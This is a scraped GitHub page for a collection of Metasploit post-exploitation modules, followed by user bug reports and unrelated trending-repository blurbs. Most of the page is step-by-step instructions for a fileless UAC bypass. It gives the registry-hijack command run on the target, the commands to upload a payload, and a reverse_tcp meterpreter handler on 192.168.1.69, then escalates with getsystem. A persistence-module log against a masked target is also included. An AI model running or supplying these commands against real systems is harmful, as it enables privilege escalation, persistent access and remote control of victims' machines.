r00t-3xp10it / msf-auxiliarys Goto Github PK
View Code? Open in Web Editor NEWMy collection of metasploit auxiliary post-modules
My collection of metasploit auxiliary post-modules
Module Author : pedr0 Ubuntu [r00t-3xp10it]
Vuln discover : @enigma0x3 | @mattifestation
Tested on : Windows 7 | Windows 8 | Windows 10
enigma_fileless_uac_bypass.rb: metasploit post-exploitation module
POC: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking
Most of the UAC bypass techniques require dropping a file to disk (for example, placing a
DLL on disk to perform a DLL hijack). The technique used in this module differs from the
other public methods and provides a useful new technique that does not rely on a privileged
file copy, code injection, or placing a traditional file on disk.
As a normal user, you have write access to keys in HKCU, if an elevated process interacts
with keys you are able to manipulate, you can potentially interfere with actions a high
integrity process is attempting to perform (hijack the process being started). Due to the
fact that I was able to hijack the process, it is possible to simply execute whatever
malicious cmd.exe or powershell.exe command you wish ..
This means that code execution has been achieved in a high integrity process
(bypassing UAC) without dropping a DLL or other file down to the file system. This
significantly reduces the risk to the attacker because they aren’t placing a traditional
file on the file system that can be caught by AV/HIPS or forensically identified later ..
WARNING: This module will not work if target UAC level its set to 'Always Notify' ..
1º - Download post-module from github using wget
wget https://github.com/r00t-3xp10it/msf-auxiliarys/blob/master/local%20privilege%20escalation/enigma_fileless_uac_bypass.rb
2º - Port post-module to metasploit database (KALI distros)
cp enigma_fileless_uac_bypass.rb /usr/share/metasploit-framework/modules/post/windows/escalate/enigma_fileless_uac_bypass.rb
3º - Start postgresql
service postgresql start
4º - Rebuild metasploit database
msfdb reinit
5º - Reload all modules into msf database
msfconsole -x 'db_status; reload_all'
6º - Load post-module
msf > use post/windows/escalate/enigma_fileless_uac_bypass
7º - read/access info/options
msf post(enigma_fileless_uac_bypass) > info
msf post(enigma_fileless_uac_bypass) > show advanced options
Privilege escalation: https://www.youtube.com/watch?v=Ph7MajHbEVQ
Simple command execution: https://www.youtube.com/watch?v=upmNEJRf5Z8
UAC bypass method credits:
@enigma0x3 @mattifestation @subTee
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking
Special Thanks:
@chaitanya (SSA Team Menber)
Hi!
Got mistake (Wsearch.rb):
_!] [ABORT]: Operative System => Windows 7 (Build 7601, Service Pack 1).
[-] Only windows systems are supported by this module...
[-] Please execute [info] for further information...
[-] Post failed: Rex::Script::Completed Rex::Script::Completed
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/escalate/Wsearch.rb:158:in unsupported' [-] /usr/share/metasploit-framework/modules/post/windows/escalate/Wsearch.rb:420:in
run'
Post module execution completed_
Tested on win7 x64.
What's wrong?
enigma_fileless_uac_bypass -- metasploit post-exploitation module:
enigma_fileless_IsolatedCommand -- metasploit post-exploitation module:
This next tutorial explains how EXEC_COMMAND can be used to achieve privilege escalation ..
We have achieved to exploit a windows target, but when trying to privilege escalation
using metasploit core modules (getprivs and getsystem) the execution fails and none
of the 3 methods available in getsystem module works...
1 - get a meterpreter session open to target system ..
"its a post-exploitation module it requires a session allready open"
2 - upload your payload.exe to target system
meterpreter > upload /root/payload.exe %temp%\\payload.exe
3 - background current session (ID 1)
meterpreter > background
4 - start a new handler in background (of the payload uploaded)
msf exploit(handler) > handler -P 666 -H 192.168.1.69 -p windows/meterpreter/reverse_tcp
5 - load enigma_fileless module
msf exploit(handler) > use post/windows/escalate/enigma_fileless ...
set SESSION 1
set EXEC_COMMAND start %temp%\\payload.exe
exploit
Hint: If we desire to use target powershell interpreter to execute payload:
set SESSION 1
set USE_POWERSHELL true
set EXEC_COMMAND start %temp%\\payload.exe
exploit
The 2 session will open as a high integrity process (elevated process hijack)
allowing us to priv escall using metasploit post-modules like getprivs and getsystem
1 - Interact with 2 session open
msf exploit(handler) > sessions -i 2
2 - elevate privileges now
meterpreter > getprivs
meterpreter > getsystem
Full command beeing executed in target machine (regedit):
cmd.exe /c REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /t REG_SZ /d "C:\Windows\System32\cmd.exe /c start %temp%\\payload.exe" /f
Privilege escalation: https://www.youtube.com/watch?v=Ph7MajHbEVQ
Simple command execution: https://www.youtube.com/watch?v=upmNEJRf5Z8
UAC bypass method credits:
@enigma0x3 @mattifestation @subTee
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking
Special Thanks:
@chaitanya (SSA Team Menber)
enigma_fileless_uac_bypass -- metasploit post-exploitation module:
This next tutorial its one example of how 'USE_POWERSHELL' and 'EXEC_COMMAND'
options can work together using the target's powershell.exe interpreter application to
execute commands.
set SESSION 1
set USE_POWERSHELL true
set EXEC_COMMAND start chrome.exe www.youporn.com
exploit
Full command beeing executed in target machine:
cmd.exe /c REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /t REG_SZ /d "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -Command start chrome.exe www.youporn.com" /f
Privilege escalation: https://www.youtube.com/watch?v=Ph7MajHbEVQ
Simple command execution: https://www.youtube.com/watch?v=upmNEJRf5Z8
UAC bypass method credits:
@enigma0x3 @mattifestation @subTee
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking
Special Thanks:
@chaitanya (SSA Team Menber)
msf post(linux/manage/kali_initd_persistence) > exploit
[!] SESSION may not be compatible with this module.
+---------------------------------------------+
| Kali Linux init.d persistence post-module |
| Author : r00t-3xp10it |
+---------------------------------------------+
Running on session : 2
Target Architecture : x64
Computer : 51.------------
Target IP addr : 51.------------
Operative System : Ubuntu 16.04 (Linux 4.4.0-31-generic)
Payload directory : /root
Client UID : uid=0, gid=0, euid=0, egid=0
[] Running module against: 51--------
[] Remote agent full path found ..
[!] Writing systemd persistence startup script ..
[+] Service path: /etc/systemd/system/persistence.service
[-] systemd script: /etc/systemd/system/persistence.service not found ..
[-] Persistence on: 51.-------------- not achieved ..
what's the problem there is /etc/systemd/system , my payload on session in meterpreter , and also set it as standalone elf file and set full path any idea ? Ubuntu has same architecture , but I can't understand what's the problem also I have check for permission its root ! tanx for your developing good script :)
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.